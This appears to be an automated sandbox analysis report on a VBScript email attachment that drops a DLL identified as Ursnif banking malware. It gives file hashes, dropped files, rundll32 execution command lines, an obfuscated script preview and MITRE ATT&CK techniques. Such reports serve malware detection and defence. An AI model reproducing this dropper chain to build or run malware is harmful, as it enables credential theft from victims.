HDC Information:	Successful, ratio: 13.2% (good quality ratio 12.6%) Quality average: 79.3% Quality standard deviation: 28.1%
HCA Information:	Successful, ratio: 58% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:45:04	API Interceptor	1x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\Rabin.dmg	documentation_07531.vbs	Get hash	malicious	Browse
	documentation_27396.vbs	Get hash	malicious	Browse
	info_70397.vbs	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Brewster.m4 Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	31
Entropy (8bit):	4.3893648586343925
Encrypted:	false
SSDEEP:	3:jRU/8UElCKe:iEUK8
MD5:	7D9E8C8A31E5DB74A019F387558C2FD7
SHA1:	9F8F21F043CB5CC1B5002F82A3CCD1083074B037
SHA-256:	BF886F8F2A23CF7B8A25DF52438692C14D022409F1D930286ABA34528D64A608
SHA-512:	A076D94E35DD074175A4F48591F7019AE2D71A0A38D56D26A4534758ECECE7E0737F7150950C32DC9B41748CCA31586559FEAA92C3948B9FD45B6C093AC44E33
Malicious:	false
Reputation:	low
Preview:	IgVZEJelgrVSfRAmJyAqahtJlgbdyun

C:\Users\user\AppData\Local\Temp\Rabin.dmg Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	463360
Entropy (8bit):	6.845616079385091
Encrypted:	false
SSDEEP:	12288:OycGIk5DHw+cppnabV/1XsiXhIbK7boMXBiu7ivtv6g:OycGIPObV/18iVboQWv6
MD5:	B1FC7DC75445A016588402757FDD6FF6
SHA1:	12AA8A932E6711BECA796F67E717523D6794DE9E
SHA-256:	94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85
SHA-512:	5EA1A7E0D938ED772AB59C486CA6D018814082E50BD000AAFAFD43929983244875792C958A4BDA8B12EDEA1888392C98C33BB26D2D3AFB1A037E1074B6ED9675
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 51%, Browse Antivirus: Metadefender, Detection: 25%, Browse Antivirus: ReversingLabs, Detection: 72%
Joe Sandbox View:	Filename: documentation_07531.vbs, Detection: malicious, Browse Filename: documentation_27396.vbs, Detection: malicious, Browse Filename: info_70397.vbs, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T@`...........!.................?....................................................@.............................\...L...P...............................@...4...T...............................@...............h............................text...L........................... ..`.rdata..j%.......&..................@..@.data...p...........................@....rsrc...............................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\adobe.url Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.699454908123665
Encrypted:	false
SSDEEP:	3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
MD5:	99D9EE4F5137B94435D9BF49726E3D7B
SHA1:	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
SHA-256:	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
SHA-512:	7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

C:\Users\user\AppData\Local\Temp\alleyway.xlsx Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	5.163574463632383
Encrypted:	false
SSDEEP:	3:3s9Lk3Z0yVQKd7OD9BBYh5u0y2WTH:3cLk3Z0slGcy2U
MD5:	77EC729601A3992F484FACC6097DEE11
SHA1:	417311EE6DC848D66E47B8E68B8F9C532AC5C79F
SHA-256:	E0E14AAFC65AF3F390D75AFF8C88FBDF7A0BF133E9F12D17E5711F4045A5C9D5
SHA-512:	F021B44ED6762993538BE2EBA289D5774CBF9CB169459CD09064898D86005C14C69A06AAD5D21CEDC81DAA779154EB912E8EB82B9245763E5F5E2C05C8653650
Malicious:	false
Reputation:	low
Preview:	FAAkBTAIhXOUAMoireRLaHxWbPUlZalWstcYxWZvVPERfYbaTQdffXmYZltOOiDpvxWUqvHGWgEostPb

C:\Users\user\AppData\Local\Temp\assai.zip Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	320012
Entropy (8bit):	7.998324397637329
Encrypted:	true
SSDEEP:	6144:DjW4WXZnaeeoYkxXTNShIvZwxpMbL0dUgkiZRQ1gmW5bhCvKZSag:waebhNGew0AdcuRQpubgSZq
MD5:	2E2BF9A0EB9139B28F959A6F17BD939B
SHA1:	BBF80A40979FF77ADB4B73DECEF9330B739BB90F
SHA-256:	8D621174B93D66DF438F8D377D2147CF578F16949E12F1E10BA34A77385D5A7E
SHA-512:	AE1F1A6084196CE0D7DA9776E8A10131BE63B7607E06EFCBD463E0D943622933BD57A74588155AB35202B1D2814C6D737D4D19EC0A8CF287BCE16A5CAEF943F9
Malicious:	true
Reputation:	low
Preview:	PK..........oR...0............Rabin.dmg..TSM..\|........RD.........".@ .B .!....]....RTzS....w}.P.Qib..{..)..>..............3...3.....M... ..O(D.r........Z..y......-3..)LmFB\tBx.vD8....&....tm.]..g.vl\$i........3.xJ. ....b.......S.j..y".>.......-..U...D.YQ..'rK.%...1..Z.....>z:e.....%........!.H...D...d.....k..?...I.....g..X....!H....h#.a~Bd8+.A..%0...z.?......!.......l@....\...fB.._...m.._...O ....v..d....r..3......+.S....P....u...nt..X...7..-#....@R`e+.d^..7.........j..y..XYP...3.}.cF....I.{..Jd_Uu.....E..,..._!.,E......A.9H7I`..@.......2....P.A...j...##1Z,.S)OIGp_(../w.J....>...E6(2M..$..._\....<9..$.....w....A.\|O.2_"....9 dM....n..g+...q$.p.>O..[....2...-...>.S.W.....M..B......F.....?X...v......!:r...Nm<..P}..3..wW.....WY.x.-Ab.P.......jBu6ZN.EV.";......`.7P....k...D3/k..cA........~.?..E.......w...}.e...M..n.G...:..&.M8...<?.F.#.u..2..B.C9...xb..T.....BD.......,....gN..._..b.{.._...'....>....E......>Kg...2.)..g\.H.7.../...3....[._

C:\Users\user\AppData\Local\Temp\hoydenish.org Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.8637132757501895
Encrypted:	false
SSDEEP:	3:vtWa/9HxtBzIZiK5joL1Mn:4a/9HaZimoZM
MD5:	178F2DF82EACC4BFB097B53800DD1375
SHA1:	5111F35F8111DF87B683550680FA04B212BEA51C
SHA-256:	2107126604B4344372E6F55EC1C5236390D69CD244AD4E1D4EDB8897EB3CC80F
SHA-512:	463289625A13052368207D93EC8F022BE92306C90F81CAE3B7410EF8248379AB3174728C6B74B2B8ADC546FACD869179AF380F55A75C340AC4E93AB3E542EC03
Malicious:	false
Reputation:	low
Preview:	CSESLsOohjfXcRaNVoRPbbBTVdxxLlXEhmACpoKBizFzenfLTOLT

C:\Users\user\AppData\Local\Temp\lowboy.less Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	5.209234836510117
Encrypted:	false
SSDEEP:	3:3ccqAlDsLLHwwgvemfXKrhhHEXVn:3zlDsLLH/nHgVn
MD5:	1D15F444BCF2648DC0721083FFF8D015
SHA1:	58FEB5CFC3AF7DC5BAA8E59737E7FF06953AE6F2
SHA-256:	D5E8F55D13488EC247B6AA3DF73F58FDEB8B7B088ED880C1C4731DB360F76C29
SHA-512:	F1BA33F7F86692DAA5CAC7D012ACBB93FF8DFE581C42966D5BCACC94CADE98B82822476FC83AEE1AFF4FDCB93040CDBE55DC5987A4A2812EE6EEB521B7BB27E1
Malicious:	false
Preview:	xxRVgMoqKLNVcBafHUHjptDNknCInDxSEsRqLjuRcKmKaopdGWZzmuqNAboAxpobTjFJlipLqDnVvOPbcGxbp

C:\Users\user\AppData\Local\Temp\technic.deb Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.288909765557392
Encrypted:	false
SSDEEP:	3:Y2HsiH2LrKo:YpVT
MD5:	F06DAE621E9DB556BF77FE26AEE12EE6
SHA1:	6F4F0CF969553AD4F74560B622AD500E62964B75
SHA-256:	191D824852449377B2AF1880BB10BB9E3A2AC22113A1A4BA7CEF068432E3EF76
SHA-512:	4974C197CD4D628D7C87A93C1B9CB88E4D0746C37293E8BE0054198EBE08ED6188EBB040EC549CE22D82E1BC74C03EEB57EC222746B7BBB4A43ECCE7B6CC785E
Malicious:	false
Preview:	XfkDGDNSNCzbIzkpbUQtSiozaaTEjbKb

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.127338439609775
TrID:
File name:	Attachment_32954.vbs
File size:	1444626
MD5:	39eb3427fd329de93a19190d84273710
SHA1:	5d9009503b3500c0b6d35e272dd9160e9d873e46
SHA256:	adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
SHA512:	37f66cd5752fa5693c8132c9bfdc0c4df05c0a8a5fe5cf9ae686b848e1196b03fbbad52babfe2c10fb2a9ba7648748883a1727fa0f79ceb0906ec6283a1366ce
SSDEEP:	24576:yc/AM+84+NfRAwmcxvZ1RWB87cZ24PX/Hh/MEUUG1AXlvU2LDkhq5o8CqE:yc/v+84+NfRAwmcxvZ1RWB87cZ24PX/u
File Content Preview:	REM Etruria intemperate rage Berra gusty Angelo townsman Howell Muzak whether bespeak ..const prey = 11..const met = 33..fixate = Array(88,83,prey,capital,expatriate,8,8,8,harden,8,169,171,119,90,138,170,247,56,146,230,capital,8,8,retch,parkway,8,fiesta,8

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 5540 Parent PID: 3388

General

Start time:	11:43:59
Start date:	09/04/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
Imagebase:	0x7ff7b3850000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 6488 Parent PID: 5540

General

Start time:	11:45:04
Start date:	09/04/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Imagebase:	0x7ff6a5f60000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 4072 Parent PID: 6488

General

Start time:	11:45:04
Start date:	09/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Imagebase:	0xfc0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Attachment_32954.vbs

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: wscript.exe PID: 5540 Parent PID: 3388

General

Analysis Process: rundll32.exe PID: 6488 Parent PID: 5540

General

Analysis Process: rundll32.exe PID: 4072 Parent PID: 6488

General

Disassembly

Code Analysis